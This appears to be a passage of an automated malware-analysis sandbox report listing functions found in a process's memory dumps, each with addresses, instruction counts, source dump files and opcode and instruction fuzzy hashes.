              • Instruction ID: faa7dd7e869a9eafa6b5267a1ed9e965663f51b4cbbb4b32a8e8bd6988a59766
              • Opcode Fuzzy Hash: 60b4cf20c25d56148cd891b28a200b02600f18eb458fe4f566db853fac8d60fe
              • Instruction Fuzzy Hash: FDF08C71F041549FEBA09F59E8187D8B776FB80711F088099EA44970A2CBB449D1CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5D88, Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bdb88634c5d1fe2bb769cfe91b5d18af4a2423e3ce98ed985426b25bd89e7c22
              • Instruction ID: 4c70c9ffbf26f29b3c668a4e7b75d07edca2b8500b83fe02ded3b1cc2f233580
              • Opcode Fuzzy Hash: bdb88634c5d1fe2bb769cfe91b5d18af4a2423e3ce98ed985426b25bd89e7c22
              • Instruction Fuzzy Hash: A1E0D8367443905FC79587B894604FD7BF9AFD2630305849FD446DF262D6768C028BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AF8B8, Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 889a747fb956afeaf6fd6bf050f6f260961ae01fd7b2251d0058035351c3af9a
              • Instruction ID: 070a157fbbf121c8a22d8a7a1a068ece54c850c6eca84d06381986305de76ec7
              • Opcode Fuzzy Hash: 889a747fb956afeaf6fd6bf050f6f260961ae01fd7b2251d0058035351c3af9a
              • Instruction Fuzzy Hash: 8AE0123BA08605DB86E4E6118510836F3BBAE42655380862BC9839AE10DB65FCC3DF83
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AAEB0, Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fbafd4308fe64841ad583102f3073f6c6ba8e42e8f85b7650bc4f548ec3f0a3
              • Instruction ID: ca20c95cf136e002f00f3b2e6cc0611ecf45e1e197940e37ccb902858af02496
              • Opcode Fuzzy Hash: 7fbafd4308fe64841ad583102f3073f6c6ba8e42e8f85b7650bc4f548ec3f0a3
              • Instruction Fuzzy Hash: D0E06D31500B108BC334DE5BD401942F7EAFBD0711B248E2F919983654DBB0A9058AA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC8E0, Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e9016ee92cce41f4ad7d06013063d0361eca7af333972bebf2448cb3fa3606f
              • Instruction ID: a42f2f6b01b500fe561970150bfffbea576ad615f7ca9f3fdf0beb9dd8ad87c7
              • Opcode Fuzzy Hash: 7e9016ee92cce41f4ad7d06013063d0361eca7af333972bebf2448cb3fa3606f
              • Instruction Fuzzy Hash: E6E012323141259B9554A66E90118BE76CFAFD95A2314016FB10BD7250DE919D03D7F2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFE28, Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 480c5ca9e4edb17e6ab1765b8b8f6f9b2ff4bbc761171f27010c1be59069338e
              • Instruction ID: ad94881523d8aab02225ffe6852493e9df2bc048e9ad08d9236ba9c1e6ba42b0
              • Opcode Fuzzy Hash: 480c5ca9e4edb17e6ab1765b8b8f6f9b2ff4bbc761171f27010c1be59069338e
              • Instruction Fuzzy Hash: E8F0AC3511420AFFCB58EF10D856969BF7ABB45341B00A015F8468A593CF30BE81CF96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A59D0, Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d50d8a19496bf811051b4c592ccffff93ab8658f5e8735ed1e8220efa91a997
              • Instruction ID: 9a820eee49ee03bcdf9c1efee397324dc6beb20d43af31eb1d141dd61d86ba04
              • Opcode Fuzzy Hash: 3d50d8a19496bf811051b4c592ccffff93ab8658f5e8735ed1e8220efa91a997
              • Instruction Fuzzy Hash: D7E08C327AA2525FCB659AB414B00A937D60AA253030045AFD006CB252C96A0C438B81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0170, Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e874979cc7ba72b32f1aaf9c0ced44cb2522d4ac0ed7f2bd85e86467f053a83d
              • Instruction ID: e31228b389d31921c437af1902fb21fbfd2d4cf05f75d3c5d05ffb886c42d58f
              • Opcode Fuzzy Hash: e874979cc7ba72b32f1aaf9c0ced44cb2522d4ac0ed7f2bd85e86467f053a83d
              • Instruction Fuzzy Hash: ECE08C315483408FC7669BB0A4290987BB0EF4623432249BFC40ACB762EABE8891CB11
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A2D20, Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fa3d3608b6ce93c9ab049b6059e12ef209d259ea86432bcc04d20087c18e0fd
              • Instruction ID: 2cd59e15df992b352bd8e4474db6faf3dbf2b41e650312439b0cb16e94bd79fb
              • Opcode Fuzzy Hash: 7fa3d3608b6ce93c9ab049b6059e12ef209d259ea86432bcc04d20087c18e0fd
              • Instruction Fuzzy Hash: B6E012361DD381DFD395579498397B0BBA1EB17332F140DA3D046C9066D2590C43CF11
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A61B8, Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b565176f1b430091e5e6955ba5c871b3b92834ed011657e5eeed952b070897c
              • Instruction ID: 1c21f2af4d193fc20c94d29afe01caf57b9494cdc35350de9cbfa5962d2892d7
              • Opcode Fuzzy Hash: 9b565176f1b430091e5e6955ba5c871b3b92834ed011657e5eeed952b070897c
              • Instruction Fuzzy Hash: 90D05B73B0C426CBDB50679DE8446693DCADB41651B4C006BDD0BD2252D9999C418B96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5CF8, Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe481eabfc976b37332a9f2e0e76c141b3135b317ad95d2c37eb53bd94ee0a4e
              • Instruction ID: 8bbc1c73f0b9e8e360d8e446c5bc896275b98df7b9b1fc4dd38991e55b831f57
              • Opcode Fuzzy Hash: fe481eabfc976b37332a9f2e0e76c141b3135b317ad95d2c37eb53bd94ee0a4e
              • Instruction Fuzzy Hash: B3D09721740229174A54B63B2804A3E324F7BD0852300442EE50AEA380EE25DC0343EA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A02A0, Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df8c7db2e21cfc097e8a3a39351cca203bc767b6ad0eb518a986da201f78c23b
              • Instruction ID: c2a0093bce0e23245341b12a797e5f0ccb25752815cedeed9ecbbf8a967c08d3
              • Opcode Fuzzy Hash: df8c7db2e21cfc097e8a3a39351cca203bc767b6ad0eb518a986da201f78c23b
              • Instruction Fuzzy Hash: 89E0EC36548B408FC3B18694E859496BBF1BB81620315895FD48286658D724BC42CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADE99, Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8ef1d90b98823c648a922ea73821d33d79b50b5f676a681192096987705e83ad
              • Instruction ID: 92e5a5590dae84f2696de1f42a87cd33529ccd90532efe7872afc398d4d61ef4
              • Opcode Fuzzy Hash: 8ef1d90b98823c648a922ea73821d33d79b50b5f676a681192096987705e83ad
              • Instruction Fuzzy Hash: FCE08C6710C740CEC761CA209408972BBB7BB79211B10995AF58B86CD3DA31AC43CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5D98, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 83eeb970cd9bfaa802df8d47c956766ba4faf248a39f0f5502106e22b9be380d
              • Instruction ID: 18cbfba165295535960c2efbb6ebaa9c36423a5dc44b3e80db202fb854a5ea6c
              • Opcode Fuzzy Hash: 83eeb970cd9bfaa802df8d47c956766ba4faf248a39f0f5502106e22b9be380d
              • Instruction Fuzzy Hash: DED0A775344124279644E5ADD850CB9739FEBD5A24305885FA90EDF391DE73DC0243D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A73C0, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e63507a46d0b4698c17a976a6fa2cf5983f2a1bf7853ad4f633581ed8527a206
              • Instruction ID: ab6fed87b5719843cfc95c3830e0355f28a812f7b3c2decf85f8dc792b5b29ab
              • Opcode Fuzzy Hash: e63507a46d0b4698c17a976a6fa2cf5983f2a1bf7853ad4f633581ed8527a206
              • Instruction Fuzzy Hash: 3BD0C23300C3548BC3358625A400776B7DAEB02714F06085ED9430594086A1EC85CB93
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A064F, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aef38787714efc9c8d80d85fb47778b60c401bc3fa1c9813e4a0a4071f0706d9
              • Instruction ID: 11714f0c72c924cfaa4e3667b5332b39b43c559afebf77c78fd9b53d09bbaf73
              • Opcode Fuzzy Hash: aef38787714efc9c8d80d85fb47778b60c401bc3fa1c9813e4a0a4071f0706d9
              • Instruction Fuzzy Hash: F9D0A7B3C86390CFC7A68A716C1E0E57B61DFE2329B15C4BBC40182521D6761E83CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE6C9, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c22227232d068a19cb63db623d7536f4dfc4b3fd4703c2d1b6201f2bb00c09e8
              • Instruction ID: c4c8e30699b47998add62fd9dca716df525e8a0c254a4abd27fb49e0682a4802
              • Opcode Fuzzy Hash: c22227232d068a19cb63db623d7536f4dfc4b3fd4703c2d1b6201f2bb00c09e8
              • Instruction Fuzzy Hash: 92E01232004612DBC368DE14D951751B7EEEB86755B502D1EE4864B590EB77BEC2CF80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADEA8, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: da8d54536b8b1b8eeef829f7aaf8a8b48117bbb14b9ba4711036b38e607183ba
              • Instruction ID: 5b5a2f868d0f086f2844811f53828337798283a2245be57e5be140b49d497e60
              • Opcode Fuzzy Hash: da8d54536b8b1b8eeef829f7aaf8a8b48117bbb14b9ba4711036b38e607183ba
              • Instruction Fuzzy Hash: 13D05E33108724DBC764D65490009B2F6BBBB69512B00842AF54B82D83CA71BC43CFD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0E58, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2292559cbc46247c74eed0721fd58597babd26e62e28f09995b9dc86b56e2cb0
              • Instruction ID: 113ed16b0aa63bf3fb036299ac006bc3c2aa7cd690e7bcc4380a16383e2bedff
              • Opcode Fuzzy Hash: 2292559cbc46247c74eed0721fd58597babd26e62e28f09995b9dc86b56e2cb0
              • Instruction Fuzzy Hash: DED0A775344124275644E5ADC8508B9779FEBD5A24305885FB90ADF391CF72DC0243D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFA6F, Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57e31d85c861af94aee1b7c2ad201f4e2b5d9aabb5b1f68467b6fd927037d5cc
              • Instruction ID: 16dd69d6c4f332cad6cf5b7eccf3590a8bf0b06fbfa8fa59136ddca58bde42a0
              • Opcode Fuzzy Hash: 57e31d85c861af94aee1b7c2ad201f4e2b5d9aabb5b1f68467b6fd927037d5cc
              • Instruction Fuzzy Hash: F6D05B302006115FE7549E5EFD05BC1B7D9BBD9700F30540D6145D71D5D6B06C414760
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0DD8, Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9bf2d2bf27d2b4d3cf3ec74af51dedd26f9e9807ff283add971fb6ecd93444f
              • Instruction ID: e55ec5f8b8739f1498c77dd9f7e730d2db5def1ed082ac11301a461bee60b5ce
              • Opcode Fuzzy Hash: a9bf2d2bf27d2b4d3cf3ec74af51dedd26f9e9807ff283add971fb6ecd93444f
              • Instruction Fuzzy Hash: 63D05E2034C204CFF7E81D0FD00533AB3969700316F04805BD38B05C168621B0428BD3
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6D30, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a0939ec5680cffb9ecca245d0aafbbebb033a67d769e75d7ec85179cdc98f5e
              • Instruction ID: 7e93bf2b438b713c6dd45f18c6e14f9814f1d7b54f7ed90f849d62f36cd72733
              • Opcode Fuzzy Hash: 9a0939ec5680cffb9ecca245d0aafbbebb033a67d769e75d7ec85179cdc98f5e
              • Instruction Fuzzy Hash: 55D0423AA000048FC704DB88D5949D9F7F1EB88225F28C1A6D915AB251C732ED56CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE6D8, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1fd4efd324ac84ec3d47548a6e1a934935c1189567b3b8e58a1cd04f44f8cbe
              • Instruction ID: 6386db976c5fa3d69e3f2df788c93f87182b049ae4c717096d0cc39cbe89c206
              • Opcode Fuzzy Hash: e1fd4efd324ac84ec3d47548a6e1a934935c1189567b3b8e58a1cd04f44f8cbe
              • Instruction Fuzzy Hash: 63D0A932008A20CB8268EA08D8005A2736FAA8232A3402D2AE00B03600CB63BC82CF80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0E18, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 90aea0ba5f77336ca8f015ab92d39d0fe88d7201fef20f896fa756942652233a
              • Instruction ID: a0e8727a03d389f3d117a11e6c805cff0486fe23ef734c4485af302014462825
              • Opcode Fuzzy Hash: 90aea0ba5f77336ca8f015ab92d39d0fe88d7201fef20f896fa756942652233a
              • Instruction Fuzzy Hash: BFD0C9213282158EF3D06EAFE40E6367F987740203F44541EFBCB85A42DFA5E900C5E6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014B23F4, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.909965691.00000000014B2000.00000040.00000001.sdmp, Offset: 014B2000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7790e062f5a58cc536362f3b218a503774169141735cd8030db7100a45a9039e
              • Instruction ID: 9550f0616134afd8bc4d90cdb0927782999299706f93717a193a0820777eb197
              • Opcode Fuzzy Hash: 7790e062f5a58cc536362f3b218a503774169141735cd8030db7100a45a9039e
              • Instruction Fuzzy Hash: 2ED05B752056914FE3168A1CC1A4FD53FE4AF51705F4644FAD8008B777C369E691D110
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6A28, Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4947d5114cb3f89afd7fd1a4d772581f9fb7aab71c1000fea4116e11335fb6f9
              • Instruction ID: 75d5ac93391a277cc10a10b3704d6fd799e2c73fcae0c831e89fbcab22be2587
              • Opcode Fuzzy Hash: 4947d5114cb3f89afd7fd1a4d772581f9fb7aab71c1000fea4116e11335fb6f9
              • Instruction Fuzzy Hash: 1AD0A93A620080CBC7984B28F0580983B66EA4232A304903AFA038DA108B320C62CF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014B23BC, Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.909965691.00000000014B2000.00000040.00000001.sdmp, Offset: 014B2000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: deff728475dc1f22ec407199a444af2932f9ae69f4f0a82b144f65897dd957ec
              • Instruction ID: 0a7b171dc985d40ad82edc6e0e32f4cbdb9f9d9ed384d49d7d9d647e2ab8dad2
              • Opcode Fuzzy Hash: deff728475dc1f22ec407199a444af2932f9ae69f4f0a82b144f65897dd957ec
              • Instruction Fuzzy Hash: 71D05E342012814BD715DB1CC1D4F9A3BD4AB41B00F0654E9AD008B376C7F4E8C1D610
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7B36, Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 299501a3eb07e0684c6c6673db3fade4796c53f9c6679b6a55540d7ac503e6ea
              • Instruction ID: 4c0dbb381a76c4b3d86d6d338888426d2883a59337f87eedec3a42f4649b9754
              • Opcode Fuzzy Hash: 299501a3eb07e0684c6c6673db3fade4796c53f9c6679b6a55540d7ac503e6ea
              • Instruction Fuzzy Hash: D7D09275A1021ADFEB61CF75E95449E7BF1EB09221B20072AE902AB795F7385D12CF10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0E91, Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f180de13f269b6bbca9ac3f3a5663d99119240dc30110f99007ac8a0d932284f
              • Instruction ID: 669fbdf05cbc998af171306d492d77961961436924ae1f15c713c13bab57bf6f
              • Opcode Fuzzy Hash: f180de13f269b6bbca9ac3f3a5663d99119240dc30110f99007ac8a0d932284f
              • Instruction Fuzzy Hash: AEC0123160420A8BC694AB68D009708F7DC6B80250F80142FD48886552FB7475414A09
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0180, Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6d4d11cf65e576a958a34497ee55ccdb0a618704abcea0140ec5fb0f71270e31
              • Instruction ID: 30b50b6cb473bc5915b7f6177cd5a5bedfa256aeb2bb2e79c5ddfb25518bac8f
              • Opcode Fuzzy Hash: 6d4d11cf65e576a958a34497ee55ccdb0a618704abcea0140ec5fb0f71270e31
              • Instruction Fuzzy Hash: B8D01230200304CFCB182F70E01D41C77A5AB88609751487DD80687754DF36E850CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5958, Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3895391f74cccc9a7c29bed55c1fa6ba811e6f972f1e43781c08efc6c15656e
              • Instruction ID: 47ca857bd1820cd1f8eae74ec194b0d53cc93a47841e23ee76d15dc0b66d0412
              • Opcode Fuzzy Hash: a3895391f74cccc9a7c29bed55c1fa6ba811e6f972f1e43781c08efc6c15656e
              • Instruction Fuzzy Hash: 56C08C312003058F8E506BB0240E63D7B4E9B801257800126A40B8D520EB209800CE82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0A20, Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7eabde279eb0e64900d9109cc301a76b1b97f4297e15c89517b15279d221b16d
              • Instruction ID: 7620278e48339d182bfa2942c6065cf60dc9500a9d16c53808d2524382f0c970
              • Opcode Fuzzy Hash: 7eabde279eb0e64900d9109cc301a76b1b97f4297e15c89517b15279d221b16d
              • Instruction Fuzzy Hash: 91C0123A6050468FEB58DE14E141A65B7E2AB80600FB0584E82AA0A9B0D234AA159E80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0660, Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf1f65dddac1b299b657b62c96079dc38417e824e7c0cf4760e0f5bc0217a7d0
              • Instruction ID: 1232c487e3d588df066ae925b153f340a182244e194a603221129bc0144892b2
              • Opcode Fuzzy Hash: cf1f65dddac1b299b657b62c96079dc38417e824e7c0cf4760e0f5bc0217a7d0
              • Instruction Fuzzy Hash: 19C09B72445254CFC2699673580D539721B57D131E754D4359501001258E767CD3DE55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC6A9, Relevance: .0, Instructions: 9COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 974e5d39c804a6bb0ed3ff78f29caf58d5b1ae841dd1e1336fb77323f351323b
              • Instruction ID: 6f21a56ea5ab6b195e596fb6ed9a02025425a687b1fc6ffc528b53739d26921d
              • Opcode Fuzzy Hash: 974e5d39c804a6bb0ed3ff78f29caf58d5b1ae841dd1e1336fb77323f351323b
              • Instruction Fuzzy Hash: CDD0CA3041A3C18FCB078B308429014BF74EE8320835A18CFE8828B2A3CA26AC56CB01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5954, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: abd4ada7d5b22d9aa3f9a85bcd54f128e14323b785215ed0ed6fdb5568b0faea
              • Instruction ID: 45eff2dacca8dd066009e2fbbd1e103ff5ea2c7df553acac64d37d7a5fa33c34
              • Opcode Fuzzy Hash: abd4ada7d5b22d9aa3f9a85bcd54f128e14323b785215ed0ed6fdb5568b0faea
              • Instruction Fuzzy Hash: 21B01233104B494B0D50D7A03088638331F57200683080213D50F8C926F710CD81CFC2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6D54, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
              • Instruction ID: 36c5e5382fc15726c36a1413f56251db196694969f97ee44a8bcee5d949dad20
              • Opcode Fuzzy Hash: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
              • Instruction Fuzzy Hash: E8B092B7E04058C9DB00DA84F4453EDF720E790269F144023C3105A000C27205A5CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A91C0, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 365968fbba6a2daeeab9ebe7a94fa732ebf2c914ae33ac027122f6db384100ee
              • Instruction ID: d911fe218b30328b72d37420103e5a98eb1bbb3f8b201826a11648f31a8f427e
              • Opcode Fuzzy Hash: 365968fbba6a2daeeab9ebe7a94fa732ebf2c914ae33ac027122f6db384100ee
              • Instruction Fuzzy Hash: F0B012313142080F2680B6B1281AE2236CC66005093800820AC0CC1600FD00E8004540
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5DD0, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 759ab8a080accd507493724e6ade63837536bc15183b8fbcaeae4bdb55cb72a6
              • Instruction ID: f01b2fbd8279cfa126f8701927dab9d457a48f511221e81f879532a06f434649
              • Opcode Fuzzy Hash: 759ab8a080accd507493724e6ade63837536bc15183b8fbcaeae4bdb55cb72a6
              • Instruction Fuzzy Hash: 43C09B3814D3C54FD7424B9444554903FB0A9033713D500DBC480C5161C26D4C459F52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AD080, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ef0c825e897c29c521f767e62319af1537faf7e25c2bdc376b36c0552b3cb5f
              • Instruction ID: 77c16ce3267f3b847013026f9e8f83b0c10bd6d6fb2bcfe1a57314e51167c917
              • Opcode Fuzzy Hash: 4ef0c825e897c29c521f767e62319af1537faf7e25c2bdc376b36c0552b3cb5f
              • Instruction Fuzzy Hash: 0BB09231008798DBC350EA25D88E9693F3AFA06241B800515F402415AD9F686D03CFAA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A2EC0, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
